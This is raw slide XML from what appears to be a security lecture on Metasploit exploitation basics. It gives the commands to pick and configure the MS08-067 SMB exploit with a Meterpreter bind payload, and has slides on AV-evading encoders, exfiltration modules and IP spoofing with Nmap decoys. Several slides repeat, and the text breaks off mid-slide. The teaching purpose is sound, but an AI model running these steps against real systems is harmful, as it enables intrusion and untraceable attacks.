              <a:t>encoders – various techniques for obfuscating payloads to avoid antivirus and IDS	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="571500" indent="-571500" algn="l">
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>exploits – organized by OS.   Ruby scripts containing the exploit code	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="571500" indent="-571500" algn="l">
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>nops– nop sleds for various CPU architecture</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="571500" indent="-571500" algn="l">
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>post – post exploitation scripts for data gather, exfiltration</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="571500" indent="-571500" algn="l">
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>payloads – 3 types (singles, stagers, stages)  OS specfic</a:t>
            </a:r>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bwMode="auto">
          <a:xfrm>
            <a:off x="406400" y="914400"/>
            <a:ext cx="12204700" cy="84772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Exploitation Basics</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="80899"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Identify vulnerability based on recon and possible output from vulnerability scanner (nessus)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="571500" indent="-571500" algn="l">
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Choose exploit which can take advantage of that vulnerability</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="571500" indent="-571500" algn="l">
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Use “search” – example using MS08-067</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="571500" indent="-571500" algn="l">
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Play techno music in background </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="80900" name="Picture 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1244600" y="5791200"/>
            <a:ext cx="10841038" cy="3498850"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>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bwMode="auto">
          <a:xfrm>
            <a:off x="330200" y="914400"/>
            <a:ext cx="12204700" cy="92392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Exploitation Basics (cont)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="81923"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“use” command followed by directory path “exploit/windows/smb/ms08_067_netapi”   </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="571500" indent="-571500" algn="l">
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Use tab completion – double tap</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="571500" indent="-571500" algn="l">
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Display options required for exploit “show options”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="571500" indent="-571500"/>
            <a:endParaRPr lang="en-US" altLang="en-US">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="81924" name="Picture 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2159000" y="4724400"/>
            <a:ext cx="7972425" cy="4808538"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>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bwMode="auto">
          <a:xfrm>
            <a:off x="330200" y="1066800"/>
            <a:ext cx="12204700" cy="763588"/>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Exploitation Basics (cont)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="82947"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Select PAYLOAD to deliver after successful exploitation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="571500" indent="-571500" algn="l">
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Can use tab completion to show options</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="571500" indent="-571500" algn="l">
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>“set PAYLOAD windows/meterpreter/bind_tcp”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="571500" indent="-571500" algn="l">
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>bind_tcp will listen for attacker to connect.  Reverse payload will connect back to the attacker</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="571500" indent="-571500" algn="l">
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="571500" indent="-571500" algn="l">
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="82948" name="Picture 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2235200" y="5715000"/>
            <a:ext cx="8348663" cy="3663950"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>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558800" y="1066800"/>
            <a:ext cx="11703050" cy="82867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4400" b="1" i="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>IP address spoofing (1)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7171" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="722313" y="5132388"/>
            <a:ext cx="11053762" cy="3662362"/>
          </a:xfrm>
          <a:noFill/>
          <a:ln>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" numCol="1" anchor="t" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:buClr>
                <a:srgbClr val="2D2D8A"/>
              </a:buClr>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Attacker doesn’t want actions traced back</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buClr>
                <a:srgbClr val="2D2D8A"/>
              </a:buClr>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Simply re-configure IP address in Windows or Unix.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buClr>
                <a:srgbClr val="2D2D8A"/>
              </a:buClr>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Or enter spoofed address in an application</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l">
              <a:buClr>
                <a:srgbClr val="2D2D8A"/>
              </a:buClr>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>e.g., decoy packets with Nmap</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7172" name="Slide Number Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12353925" y="9428163"/>
            <a:ext cx="650875" cy="325437"/>
          </a:xfrm>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{9A643FB8-2872-470C-9F5C-5ACE8B388F8A}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>8</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="7173" name="Group 4"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="1473200" y="2286000"/>
            <a:ext cx="9566275" cy="2414588"/>
            <a:chOff x="837" y="991"/>
            <a:chExt cx="3982" cy="781"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:graphicFrame>
          <p:nvGraphicFramePr>
            <p:cNvPr id="7174" name="Object 5"/>
            <p:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </p:cNvGraphicFramePr>
            <p:nvPr/>
          </p:nvGraphicFramePr>
          <p:xfrm>
            <a:off x="919" y="1237"/>
            <a:ext cx="385" cy="328"/>
          </p:xfrm>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
              <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
                <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                  <p:oleObj spid="_x0000_s7216" name="Clip" r:id="rId3" imgW="1307079" imgH="1083682" progId="">
                    <p:embed/>
                  </p:oleObj>
                </mc:Choice>
                <mc:Fallback>
                  <p:oleObj name="Clip" r:id="rId3" imgW="1307079" imgH="1083682"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 y="1237"/>
                          <a:ext cx="385" cy="328"/>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7175" name="Object 6"/>
            <p:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </p:cNvGraphicFramePr>
            <p:nvPr/>
          </p:nvGraphicFramePr>
          <p:xfrm>
            <a:off x="4278" y="1237"/>
            <a:ext cx="385" cy="328"/>
          </p:xfrm>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
              <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
                <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                  <p:oleObj spid="_x0000_s7217" name="Clip" r:id="rId5" imgW="1307079" imgH="1083682" progId="">
                    <p:embed/>
                  </p:oleObj>
                </mc:Choice>
                <mc:Fallback>
                  <p:oleObj name="Clip" r:id="rId5" imgW="1307079" imgH="1083682"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8" y="1237"/>
                          <a:ext cx="385" cy="328"/>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sp>
          <p:nvSpPr>
            <p:cNvPr id="7176" name="Text Box 7"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3977" y="1633"/>
              <a:ext cx="842" cy="129"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr>
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="en-US" sz="2000">
                  <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>212.68.212.7</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="7177" name="Text Box 8"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="837" y="1643"/>
              <a:ext cx="983" cy="129"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr>
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="en-US" sz="2000">
                  <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>145.13.145.67</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="7178" name="Line 9"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1444" y="1403"/>
              <a:ext cx="2710" cy="0"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd type="triangle" w="med" len="med"/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="7179" name="Text Box 10"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2237" y="991"/>
              <a:ext cx="1233" cy="229"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr>
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="en-US" sz="2000">
                  <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>SA: 36.220.9.59</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="en-US" sz="2000">
                  <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>DA: 212.68.212.7</a:t>
              </a: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bwMode="auto">
          <a:xfrm>
            <a:off x="330200" y="914400"/>
            <a:ext cx="12204700" cy="687388"/>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Exploitation Basics (cont)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="83971" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="635000" y="1905000"/>
            <a:ext cx="11703050" cy="6435725"/>
          </a:xfrm>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“show options” now shows PAYLOAD options</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="571500" indent="-571500" algn="l">
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>“set” command will set the options</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="571500" indent="-571500" algn="l">
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>“set PAYLOAD windows/meterpreter/bind_tcp”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="571500" indent="-571500" algn="l">
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>bind_tcp will listen for attacker to connect.  Reverse payload will connect back to the attacker</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="571500" indent="-571500" algn="l">
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="571500" indent="-571500" algn="l">
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="83972" name="Picture 5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4064000" y="4724400"/>
            <a:ext cx="6038850" cy="4899025"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>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bwMode="auto">
          <a:xfrm>
            <a:off x="406400" y="914400"/>
            <a:ext cx="12204700" cy="839788"/>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Exploitation Basics (cont)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="84995" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="635000" y="1752600"/>
            <a:ext cx="11703050" cy="6435725"/>
          </a:xfrm>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“show options” now shows PAYLOAD options</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="571500" indent="-571500" algn="l">
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>“set” command will set the options</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="571500" indent="-571500" algn="l">
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>“set PAYLOAD windows/meterpreter/bind_tcp”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="571500" indent="-571500" algn="l">
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>bind_tcp will listen for attacker to connect.  Reverse payload will connect back to the attacker</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="571500" indent="-571500" algn="l">
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="571500" indent="-571500" algn="l">
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="84996" name="Picture 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3530600" y="4648200"/>
            <a:ext cx="6973888" cy="4941888"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>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bwMode="auto">
          <a:xfrm>
            <a:off x="330200" y="1066800"/>
            <a:ext cx="12204700" cy="763588"/>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Exploitation Basics (cont)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="86019"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“show options” now shows PAYLOAD options</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="571500" indent="-571500" algn="l">
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>“set” command will set the options</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="571500" indent="-571500" algn="l">
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>“set PAYLOAD windows/meterpreter/bind_tcp”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="571500" indent="-571500" algn="l">
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
